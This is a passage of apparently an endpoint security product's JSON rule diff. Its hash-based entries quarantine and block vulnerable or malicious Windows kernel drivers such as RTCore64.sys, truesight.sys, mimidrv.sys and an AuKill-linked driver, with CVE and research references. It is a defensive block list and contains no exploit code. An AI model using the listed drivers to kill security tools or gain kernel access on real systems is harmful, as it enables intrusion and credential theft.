"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0be4912bfd7a79f6ebfa1c06a59f0fb402bd4fe0158265780509edd0e562eac1", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe535935-34ce-50f7-b996-bc197d68e862", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144902Z", + "creation_date": "2026-03-23T11:45:32.144905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae095718a860962d213622b719f8dbcde190e4bedc2cd92e3865efaede65380f", + "comment": "Vulnerable Kernel Driver (aka tboflhelper.sys) [https://www.loldrivers.io/drivers/07c57c69-c8d7-40cf-8bcc-612671427044/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe54003a-4eca-5a70-8484-9505c0d947c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833671Z", + "creation_date": "2026-03-23T11:45:30.833675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833683Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a414cc7b9da40056835645b86ff7b722160c6e41add2d4a527cca1256086a2d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe58a499-1770-56d0-be87-c8f96c9040e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835755Z", + "creation_date": "2026-03-23T11:45:30.835757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c2c87b67ce1fc02c4b1fc748d8e444bfac462394f88c7547a2d1b2cb8d9b2e3", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe594c97-a92b-5aa7-a1b8-0b0a8c2fb8e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827730Z", + "creation_date": "2026-03-23T11:45:31.827732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bab93587bf3d029723aa1348414a9aff5e032d52811ad42d6d8649d7668cc1a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe5c63ee-c7f1-5795-8484-6b69cef39233", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:29.618443Z", + "creation_date": "2026-03-23T11:45:29.618445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618451Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe2fb5d6cfcd64aeb62e6bf5b71fd2b2a87886eb97ab59e5353ba740da9f5db5", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe5d6e49-8eb0-51cb-9c14-215c9f4bd7b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470610Z", + "creation_date": "2026-03-23T11:45:30.470614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6413aa70a5664953223205b6364d676fac0c0491d12ddaadc91b7f12fa53f77b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe5e84aa-e823-5fdb-b1b5-a3b7d7c2d181", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979238Z", + "creation_date": "2026-03-23T11:45:29.979241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979246Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c7f24d8ed000bc7ce842e4875b467f9de1626436e051bd351adf1f6f8bbacf8", + "comment": "Vulnerable Kernel Driver (aka d2.sys) [https://www.loldrivers.io/drivers/d05a0a6c-c037-4647-99ac-c41593190223/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe6176ae-6f93-5bbc-96d4-5d4795334128", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967693Z", + "creation_date": "2026-03-23T11:45:29.967695Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7fb0f6fc5bdd22d53f8532cb19da666a77a66ffb1cf3919a2e22b66c13b415b7", + "comment": "Vulnerable Kernel Driver (aka fidpcidrv64.sys) [https://www.loldrivers.io/drivers/a005e057-c84f-47cd-9b4b-5b1e51a06ab4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe684a73-3224-502b-b6a2-b8e5a6cd1dcf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619867Z", + "creation_date": "2026-03-23T11:45:29.619879Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619884Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cef918675dfaeb50cacd36b9c06871fd05e9ffea7addf98a396fae131abe30a", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe6b3c93-b100-561e-a35d-433e22332075", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499269Z", + "creation_date": "2026-03-23T11:45:31.499272Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9aa200322a44c8dcd91a8a7075ee5f23248401a53d532081f28d9b5c7fb49b1a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe7f4840-f5e0-53d4-976a-b8bb2b1632ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615272Z", + "creation_date": "2026-03-23T11:45:29.615274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615279Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"299f36c717c5d5d77a8e9c15879e95cd825f74e77c7ed24e7cccbefeb38a2165", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe860e38-399f-5521-908c-2475266b7a6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976903Z", + "creation_date": "2026-03-23T11:45:29.976905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3513c01158cb9d473c4cf99bb7fa73363531edf5b7bf4c7c4cfedecb6fe1775b", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe8d2098-c900-5f7f-b3a2-70092468bdfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481390Z", + "creation_date": "2026-03-23T11:45:31.481394Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481404Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1050f743944f58a7d74a3b34c8ca5b038de9fee3bf7ab39cfb531742f91db90a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe8e340f-4986-5131-b9ef-3b090fb5b13b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818520Z", + "creation_date": "2026-03-23T11:45:31.818524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0972fa03d469209602de929894d1a99fc18b5565d621b2aad826e7575a9b72d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe93ceb1-4223-538a-8034-fdcf4c38d7a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467955Z", + "creation_date": "2026-03-23T11:45:30.467960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b6d450b6e2b66e8356b9d8a354e8c3a96426b7f15adf2f2025dda13c01881a3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe9e30d7-42cd-5bf4-8533-ffc6aa44e019", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818595Z", + "creation_date": "2026-03-23T11:45:30.818597Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c018eaa293c03febe2aef1e868fca782a06b49d7d2f9f388ae5fb57604c5250", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fea4556e-3811-5b05-8260-c70f7cc31eb0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607935Z", + "creation_date": "2026-03-23T11:45:29.607937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607950Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9895458e73d4b0ef01eda347fb695bb00e6598d9f5e2506161b70ad96bb7298", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fea99ad8-0cd1-5ffa-a3bf-f3f17e104c60", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156758Z", + "creation_date": "2026-03-23T11:45:31.156759Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156765Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e5c7d0ca29d9f9420848aaa8d05ae59aa366a490c2b010e3e1becb3eb0ff3dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "feb1a439-8e4e-566c-a5ae-dac318aa0b1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140819Z", + "creation_date": "2026-03-23T11:45:31.140821Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140827Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1bd9b485f6859a19552d9b01432be73b0bcde66aab8b9423c77d8817e930157", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "feb289df-0bb6-5b34-898a-cb71d54ab887", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822372Z", + "creation_date": "2026-03-23T11:45:30.822374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cc23f39380a590d822d9c064a064c274554d814b651ae4b2f0560d8b016f105", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "feb6edc4-0730-5325-919b-7be6539cc845", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612933Z", + "creation_date": "2026-03-23T11:45:29.612935Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612940Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "615a7c647eba3f2dcea463d5705d5d59ca70b4250f895ad20ce6876076a8fa28", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "febb9889-8416-54ca-b5c9-9cc527864a05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145429Z", + "creation_date": "2026-03-23T11:45:32.145433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"206006a11f233b9ae876952308f6d60d7a75c80b4d530a3e6146a0b4d8cd3e4f", + "comment": "Malicious Kernel Driver (aka driver_206006a1.sys) [https://www.loldrivers.io/drivers/9e0a1bae-6509-41fd-a5bf-dfe6cf388682/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fec757b9-dee7-5ae6-9539-08938e7effc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152899Z", + "creation_date": "2026-03-23T11:45:31.152902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae896bb9bea5396d46552a7b6980110b24751522e55228728d3e15c9760ec610", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fed9d6d0-0c43-5c67-924b-025236b34707", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157493Z", + "creation_date": "2026-03-23T11:45:31.157495Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb31600da026a2b53fed032d906928e27ff317829e8ad77cd20aa838cac05f62", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fedb3b3e-bbb1-5d14-8e94-dfffa6ade235", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 